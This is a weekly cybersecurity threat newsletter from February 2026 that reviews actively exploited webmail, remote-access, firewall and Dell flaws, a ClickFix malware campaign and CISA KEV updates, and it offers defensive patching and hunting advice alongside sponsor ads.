Market & Momentum - 02/23/2026

This week opens with sharpened enterprise risk around exploited webmail flaws, remote access takeover paths, and perimeter device compromise... proving (again) that attackers don’t need creativity when your edge is doing the hard work for them.

Author

J.W. Croley
February 23, 2026

In partnership with

The Tech newsletter for Engineers who want to stay ahead

Tech moves fast, but you're still playing catch-up?

That's exactly why 100K+ engineers working at Google, Meta, and Apple read The Code twice a week.

Here's what you get:

  • Curated tech news that shapes your career - Filtered from thousands of sources so you know what's coming 6 months early.

  • Practical resources you can use immediately - Real tutorials and tools that solve actual engineering problems.

  • Research papers and insights decoded - We break down complex tech so you understand what matters.

All delivered twice a week in just 2 short emails.

Over the last ~72 hours, threat signals converged on five patterns: active exploitation in webmail, remote access platform compromise, hardware/vendor edge exposure, “living-off-the-user” malware delivery, and KEV-driven patch compression.

Together, these trends reinforce a simple operational reality: if your external-facing surface area isn’t tightly governed (patch, isolate, monitor), your incident response plan becomes the change-management process you never had.

📈 Risk Forecast – The Week Ahead 📉

Trend (Macro)

Likelihood

Direction

Signal for the Week

Active exploitation of internet-facing email/webmail platforms

81%

🔺 Rising

Webmail flaws are getting operationalized quickly once exploit details circulate.

Remote access platform compromise enabling rapid lateral movement

77%

🔺 Rising

RCE + persistence inside privileged access tooling is a worst-case combo.

Perimeter device compromise (firewalls/edge appliances) at scale

74%

🔺 Rising

Opportunistic scanning + weak hygiene = mass exploitation potential.

Social-engineering delivery chains (“ClickFix”-style execution)

69%

🔺 Rising

Users are still being turned into the payload runner.

KEV-driven patch triage pressure

66%

➡ Stable

“Actively exploited” listings keep tightening patch timelines and outage risk.

🔎 Key Watchlist Items 🔍

  1. Roundcube webmail vulnerabilities exploited in attacks
    CISA-backed reporting shows attackers actively abusing recent Roundcube bugs, meaning externally reachable webmail stacks should be treated as Roundcube-exposed until proven otherwise.

  2. BeyondTrust RS/PRA critical flaw actively exploited (CVE-2026-1731)
    Threat actors are using a high-severity remote access weakness to gain persistence and move laterally, turning privileged tooling into an attacker trampoline via CVE-2026-1731.

  3. CISA orders rapid patching of an actively exploited Dell flaw
    KEV-driven deadlines are forcing “patch-now” decisions; if Dell management utilities exist in your estate, treat this as a KEV-patch priority, not a backlog item.

  4. AI-assisted actor reportedly breached 600 Fortinet FortiGate firewalls
    Whether you buy the “AI” label or not, the pattern is the same: exposed firewall surfaces get hammered at scale, and “edge security” becomes an ironic phrase during a FortiGate-breach wave.

  5. ClickFix campaign abusing compromised sites to deploy a new RAT
    This is “user-assisted execution” evolving again: compromised legit sites push scripted steps that install malware when victims comply, making ClickFix an evergreen problem for endpoint and awareness programs.

  6. CISA adds four more vulnerabilities to the Known Exploited catalog
    Another KEV update means more patch triage pressure; operationally, treat KEV-additions as your “what attackers are using right now” shortlist.

6 Predictions Every CX Leader Should Know

AI is redefining how customer conversations are designed, operated, and improved.

This guide outlines six shifts that will shape enterprise CX in 2026 — and what leaders need to rethink now.

📊 Emerging Patterns 📊

Webmail remains a high-leverage entry point: It’s exposed, commonly under-patched, and immediately valuable for credential access and internal pivoting.

Remote access tools are becoming “instant enterprise access”: This will be leveraged when vulnerabilities hit, especially when they sit on privileged lanes.

Edge appliances are still the soft underbelly: If your firewall is reachable, it’s being scanned… nonstop.

User-execution chains keep winning: Because they bypass a lot of preventive controls with one simple trick… the user did it.

KEV isn’t just compliance: It’s your best proxy for what’s weaponized and being used at scale.

⏰ Call to Action ⏰

Webmail exploitation defense: confirm patch levels, restrict admin paths, and hunt for abnormal auth spikes, mailbox rule creation, suspicious POST patterns, and weird attachment/SVG handling.

Remote access hardening (BeyondTrust-class systems): isolate management interfaces, enforce MFA everywhere, review privileged session logs, and hunt for new services, scheduled tasks, and unexpected admin account activity.

Dell/endpoint utility exposure: locate impacted components fast (asset inventory), patch with validation, then verify telemetry continuity (don’t “patch blind” and lose signal).

Fortinet edge posture: confirm firmware levels, reduce internet exposure, rotate credentials/keys where applicable, and baseline config changes (especially admin accounts and remote management toggles).

ClickFix containment: detect suspicious command execution patterns, block common LOLBAS abuse paths where feasible, and reinforce the rule: “IT will not ask you to paste commands from a webpage.”

KEV triage discipline: prioritize externally reachable + identity-adjacent systems first; schedule downtime intentionally rather than during an incident bridge.

⚡ Monday Motivation ⚡

You don’t need perfect security…

You need owned assets, fast patch validation, and zero “mystery internet-facing boxes.” 

That’s how you survive weeks like this without living in your war room.

This week’s theme is simple: the edge is still the battleground, and the losers are the orgs who treat external exposure like a ticket queue instead of an emergency.

(P.S. Forward this to the SOC, infrastructure owners, and IAM leadership so patch urgency, edge governance, and remote access controls stay aligned.)

How Marketers Are Scaling With AI in 2026

61% of marketers say this is the biggest marketing shift in decades.

Get the data and trends shaping growth in 2026 with this groundbreaking state of marketing report.

Inside you’ll discover:

  • Results from over 1,500 marketers centered around results, goals and priorities in the age of AI

  • Stand out content and growth trends in a world full of noise

  • How to scale with AI without losing humanity

  • Where to invest for the best return in 2026

Download your 2026 state of marketing report today.